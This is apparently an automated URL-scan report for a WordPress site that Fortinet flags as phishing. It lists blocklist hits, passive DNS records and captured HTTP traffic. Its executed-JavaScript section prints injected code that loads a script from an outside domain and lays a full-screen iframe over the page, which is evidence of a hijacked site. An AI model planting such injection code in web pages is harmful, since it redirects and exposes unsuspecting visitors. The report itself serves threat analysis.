Overview

URL: www.grandmiramor.com/
IP: 156.240.38.111
ASN: HONG KONG Megalayer Technology Co.,Limited
Location: Hong Kong
Report completed: 2022-11-24 15:13:17 UTC
urlquery Alerts: No alerts detected


Settings

UserAgent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-11-24 2 www.grandmiramor.com/ Phishing
2022-11-24 2 www.grandmiramor.com/ Phishing
2022-11-24 2 grandmiramor.com/wp-includes/css/classic-themes.min.css?ver=1 Phishing
2022-11-24 2 grandmiramor.com/vue.min.js Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/fontawesome/web (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/waypoints/jquer (...) Phishing
2022-11-24 2 grandmiramor.com/ Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/fontawesome/css (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/prettyphoto/css (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/style.css?ver=6.1.1 Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/sparklethemes/mobile-menu/navi (...) Phishing
2022-11-24 2 grandmiramor.com/wp-includes/js/wp-emoji-release.min.js?ver=6.1.1 Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/prettyphoto/js/ (...) Phishing
2022-11-24 2 grandmiramor.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1 Phishing
2022-11-24 2 grandmiramor.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/lightslider/js/ (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/theia-sticky-si (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/css/responsive.css?ver=6.1.1 Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (16)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS ocsp.pki.goog (5) 175 2018-07-01 06:43:07 UTC 2020-05-02 20:58:16 UTC 142.250.74.3
mnemonic passive DNS ocsp.globalsign.com (2) 2075 2012-07-20 17:46:16 UTC 2020-05-02 20:58:10 UTC 104.18.21.226
mnemonic passive DNS www.slb5288.com (13) 0 2022-07-11 06:49:41 UTC 2022-11-23 13:36:37 UTC 103.35.116.217 Unknown ranking
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-11-24 05:36:55 UTC 34.102.187.140
mnemonic passive DNS s.w.org (1) 748 2017-01-30 04:56:16 UTC 2022-11-24 05:41:41 UTC 192.0.77.48
mnemonic passive DNS fonts.googleapis.com (1) 8877 2013-06-10 20:14:26 UTC 2022-11-24 11:11:51 UTC 142.250.74.10
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-11-24 05:30:55 UTC 34.117.237.239
mnemonic passive DNS push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 52.89.114.252
mnemonic passive DNS img-getpocket.cdn.mozilla.net (5) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
mnemonic passive DNS fonts.gstatic.com (2) 0 2014-09-09 00:40:21 UTC 2022-11-24 11:09:52 UTC 216.58.207.195 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS r3.o.lencr.org (8) 344 No data No data 23.36.76.226
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
mnemonic passive DNS www.grandmiramor.com (2) 0 2019-02-13 18:05:45 UTC 2022-11-24 11:12:43 UTC 156.240.38.111 Unknown ranking
mnemonic passive DNS grandmiramor.com (33) 0 2015-06-01 08:23:15 UTC 2022-10-29 22:11:56 UTC 156.240.38.111 Unknown ranking
mnemonic passive DNS hm.baidu.com (4) 8254 2012-05-26 08:38:45 UTC 2020-02-11 02:47:13 UTC 103.235.46.191
mnemonic passive DNS ocsp.digicert.com (2) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 156.240.38.111

Date  UQ / IDS / BL  URL  IP
2022-12-03 03:12:25 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-11-30 07:11:19 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-11-26 23:11:45 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-11-24 23:14:09 +0000  0 - 0 - 2  www.grandmiramor.com/  156.240.38.111
2022-11-24 15:13:17 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111

Last 5 reports on ASN: HONG KONG Megalayer Technology Co.,Limited

Date  UQ / IDS / BL  URL  IP
2022-12-03 08:52:15 +0000  0 - 0 - 4  lkjianfei.com/  154.55.252.175
2022-12-03 08:11:40 +0000  0 - 0 - 20  terroantkiller.com/  154.64.12.112
2022-12-03 03:12:25 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-12-02 12:40:49 +0000  0 - 0 - 7  www.guoguojf.com/tz8t/?y4L0=bA4t+Xh+7xa2wm4yX (...)  154.22.245.78
2022-12-02 05:11:41 +0000  0 - 0 - 1  lpsgkls.com/  154.64.34.209

Last 5 reports on domain: grandmiramor.com

Date  UQ / IDS / BL  URL  IP
2022-12-03 03:12:25 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-11-30 07:11:19 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-11-26 23:11:45 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-11-24 23:14:09 +0000  0 - 0 - 2  www.grandmiramor.com/  156.240.38.111
2022-11-24 15:13:17 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111

Last 5 reports with similar screenshot

Date  UQ / IDS / BL  URL  IP
2022-12-03 03:12:25 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-11-23 11:11:58 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-11-23 07:54:52 +0000  0 - 0 - 18  gzslxhg.com/  206.233.203.216
2022-11-23 07:11:55 +0000  0 - 0 - 18  www.grandmiramor.com/  156.240.38.111
2022-11-21 23:11:58 +0000  0 - 0 - 19  www.grandmiramor.com/  156.240.38.111


JavaScript

Executed Scripts (18)


Executed Evals (1)

#1 JavaScript::Eval (size: 121, repeated: 1) - SHA256: 351c61c90255ce1f7c781134c7f0565fc251ab0856c86c123195236129315c16

                                        document.writeln("<script language='javascript' type='text/javascript' src='https://www.slb5288.com/js/ob.js'></script>")
                                    

Executed Writes (6)

#1 JavaScript::Write (size: 178, repeated: 1) - SHA256: e1269a33e0b3f9de8393afde7898bc5736375dae29d3a43c4b00941c6306f8fb

                                        < iframe src = " https://www.slb5288.com/go/ob.html"
frameborder = "0"
style = "border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;" > < /iframe>
                                    

#2 JavaScript::Write (size: 6, repeated: 1) - SHA256: aac32651b10f567c461b9b4f255d6fb1fa6859b5368d8bd9a51af920ab21cf23

                                        < /div>
                                    

#3 JavaScript::Write (size: 101, repeated: 1) - SHA256: 8f35c718818ac4bf7efbd537a43227b298844f5eb5d60a85d813440b96b9a454

                                        < script language = 'javascript'
type = 'text/javascript'
src = 'https://www.slb5288.com/js/ob.js' > < /script>
                                    

#4 JavaScript::Write (size: 103, repeated: 1) - SHA256: 53db339b0b80637f13dfc63813d7366c899cebe0db896602886ece619163d82e

                                        < meta id = "viewport"
name = "viewport"
content = "user-scalable=no,width=device-width, initial-scale=1.0" / >
                                    

#5 JavaScript::Write (size: 77, repeated: 1) - SHA256: 235f11ebdcfb5a9e00906afc39c11efbaeed816b9040567cd61f18f9ce7242d4

                                        < style > html, body {
    widht: 100 % ;height: 100 % ;overflow: hidden;clear: both;
} < /style>
                                    

#6 JavaScript::Write (size: 102, repeated: 1) - SHA256: f586d612c00723dedb1ced3c5f41ec9def9333bd0669dfe697d48f99c9e19fc2

                                        < div style = "width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff" >
                                    


HTTP Transactions (83)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "164D11173045B569CAFB32E300E4C1EC6D6AB177FD34D0414CC40C541268779F"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3594
Expires: Thu, 24 Nov 2022 16:13:00 GMT
Date: Thu, 24 Nov 2022 15:13:06 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 6127
Cache-Control: max-age=162012
Date: Thu, 24 Nov 2022 15:13:06 GMT
Etag: "637f47ef-1d7"
Expires: Sat, 26 Nov 2022 12:13:18 GMT
Last-Modified: Thu, 24 Nov 2022 10:31:11 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Backoff, Alert, Content-Type, Retry-After, Content-Length
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Thu, 24 Nov 2022 14:18:58 GMT
cache-control: public,max-age=3600
age: 3248
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    d130218d0e2841f39c99610fe1a2ab90
Sha1:   29fbe1e177ee55c7a61ae0a206afff271cf5f945
Sha256: 6b6d74dccf10c2bc98a91c3388280d7ba1d9596bf8cadd7db0e2f63720b3d152
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C9951A909F354174F0075A01C01C3C3AA6960983040E328BFBBBEA81AEB405C2"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9909
Expires: Thu, 24 Nov 2022 17:58:15 GMT
Date: Thu, 24 Nov 2022 15:13:06 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: X2+08zuzIJ644L683/US8yT8oqDDf8a3PNFpJ3Ph3RqkXplc9MvZu/Z3NWGydGvjEiuQU/HI/Ow=
x-amz-request-id: BPN174B2R62X82XS
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Thu, 24 Nov 2022 14:40:26 GMT
age: 1960
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:06 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET / HTTP/1.1 
Host: www.grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         156.240.38.111
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.21
X-Redirect-By: WordPress
Location: https://www.grandmiramor.com/


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Retry-After, Content-Length, Alert, Cache-Control, ETag, Pragma, Expires, Backoff, Last-Modified
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Thu, 24 Nov 2022 15:11:11 GMT
cache-control: public,max-age=3600
age: 116
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5304
Cache-Control: max-age=156126
Date: Thu, 24 Nov 2022 15:13:07 GMT
Etag: "637f3429-1d7"
Expires: Sat, 26 Nov 2022 10:35:13 GMT
Last-Modified: Thu, 24 Nov 2022 09:06:49 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: WLOUUGhGhgkM3xNut0VPCw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         52.89.114.252
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: kglaOKvX/BPrVtWYojtaGgavWZc=

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C3A864FACD0F4AFB3A747ECC456335CE9A850DC414A06798048ADEC29C380668"
Last-Modified: Wed, 23 Nov 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Thu, 24 Nov 2022 21:13:07 GMT
Date: Thu, 24 Nov 2022 15:13:07 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13219
Expires: Thu, 24 Nov 2022 18:53:27 GMT
Date: Thu, 24 Nov 2022 15:13:08 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13219
Expires: Thu, 24 Nov 2022 18:53:27 GMT
Date: Thu, 24 Nov 2022 15:13:08 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13219
Expires: Thu, 24 Nov 2022 18:53:27 GMT
Date: Thu, 24 Nov 2022 15:13:08 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13219
Expires: Thu, 24 Nov 2022 18:53:27 GMT
Date: Thu, 24 Nov 2022 15:13:08 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fca5cb469-21a0-420a-875c-a81635b33f53.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7993
x-amzn-requestid: 9f0ff853-4819-47cd-959d-658401ea5748
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvCsG5mIAMFqAQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9211-1c48b9223684f2942f8dd42d;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:35:13 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: 7YSXUV-LZpsI7vciFhuqt1EVr6YRkhxcOgMg8z8bxLcOE01_baf6Gg==
via: 1.1 d1151317ba32afe0e6370fd69fed222e.cloudfront.net (CloudFront), 1.1 1b74ccf4cb51eacf97a0e6d60ae46a3e.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:47:06 GMT
etag: "43d1dec7fc06879988c9c3cadd800cc8145df988"
age: 62762
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7993
Md5:    92c78302bcce1568eb6a5563100b932c
Sha1:   43d1dec7fc06879988c9c3cadd800cc8145df988
Sha256: 0dda9914306c8e3a7ea75eade8e762652d93907dd6c5a8cc81707d6d8098b60a
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1dd98515-d0af-440a-8f3d-4c9986928081.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4309
x-amzn-requestid: a22b4d7e-e208-4bda-81c2-d13e6463380e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: blE0hGNioAMF_Tg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6371e81c-1b13846866f56a0e47675e56;Sampled=0
x-amzn-remapped-date: Mon, 14 Nov 2022 07:02:52 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 0sYKpJWi2Tv9Atz3PYXm5j7kmncAOxjcLcK4hgAkJ5b4pNMDmjdB6g==
via: 1.1 ddd913fbbe7367d44af4ac06097e7a2a.cloudfront.net (CloudFront), 1.1 28390a4d24ed4fdccd685d99cd06cf4e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 07:14:07 GMT
age: 28741
etag: "126771b86638108050cf57c0d12faa27f80f0edb"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4309
Md5:    841a4b110022a99ddea6f7bf66df0fa1
Sha1:   126771b86638108050cf57c0d12faa27f80f0edb
Sha256: 240fbffc1f9104433297d3ff7afba2d0b58d7f1b13d9a9260a1bad25216665db
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F433fbaf5-7c54-485b-af70-542e1e788832.webp HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5070
x-amzn-requestid: d86d95ad-9b78-4047-82e7-04e83a97e330
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEwViF1GIAMF_PQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9423-10809ba1634776171cf79cb8;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:44:03 GMT
x-amz-cf-pop: SFO5-P2, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 8rbsN9OVJmneT9ov-Q7V4RB8DP5UWhhn-7cnukHiBpl06zmMM0zJTg==
via: 1.1 0dc4feb22bb4657ce2bb95fd05ec7122.cloudfront.net (CloudFront), 1.1 d6a002c70d55f415107618b0750d493c.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:57:20 GMT
age: 62148
etag: "89accd230fba95fe0049678070817b36ead015fa"
cache-control: max-age=3600,public,public
